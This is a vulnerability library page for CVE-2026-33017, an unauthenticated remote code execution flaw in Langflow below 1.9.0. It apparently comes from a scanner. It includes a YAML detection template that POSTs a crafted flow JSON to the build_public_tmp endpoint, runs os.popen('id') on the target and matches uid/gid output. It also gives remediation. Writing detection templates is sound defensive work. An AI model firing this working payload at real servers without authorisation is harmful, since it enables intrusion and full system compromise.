/Vulnerability Library

Langflow < 1.9.0 - Remote Code Execution

CVE-2026-33017
Verified

Description

Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.

Severity

Critical

CVSS Score

9.8

Exploit Probability

23%

Affected Product

langflow

Published Date

March 24, 2026

Template Author

himind

CVE-2026-33017.yaml
id: CVE-2026-33017

info:
  name: Langflow < 1.9.0 - Remote Code Execution
  author: himind
  severity: critical
  description: |
    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
  impact: |
    Remote attackers can execute arbitrary Python code without authentication, leading to full system compromise.
  remediation: |
    Update to version 1.9.0 or later.
  reference:
    - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
    - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33017
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-33017
    epss-score: 0.23243
    epss-percentile: 0.9602
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: langflow
    product: langflow
    shodan-query: http.favicon.hash:1727196746
  tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev

variables:
  uuid: "{{uuid}}"

flow: http(1) || http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/build_public_tmp/{{uuid}}/flow"

    body: |
      {
        "data": {
          "nodes": [
            {
              "data": {
                "node": {
                  "template": {
                    "code": {
                      "value": "def function():\n    import os\n    return os.popen('id').read()"
                    }
                  }
                }
              }
            }
          ]
        }
      }
    headers:
      Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
          - 'contains(body, "xmsg\":")'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/version"

    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '< 1.9.0')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: json
        name: version
        json:
          - ".version"
        internal: true
# digest: 490a0046304402202c786f5d24e41130904214f723a9dec406fef8b5f2cf1d63f21ef35d3dfc5ea902206865dad19e30b791151daaefe73543b7c5312dc894a218525a5389fcbf58dd51:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2026-33017
CWE ID:
cwe-94

References

https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.htmlhttps://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hourshttps://nvd.nist.gov/vuln/detail/CVE-2026-33017

Remediation Steps

Update to version 1.9.0 or later.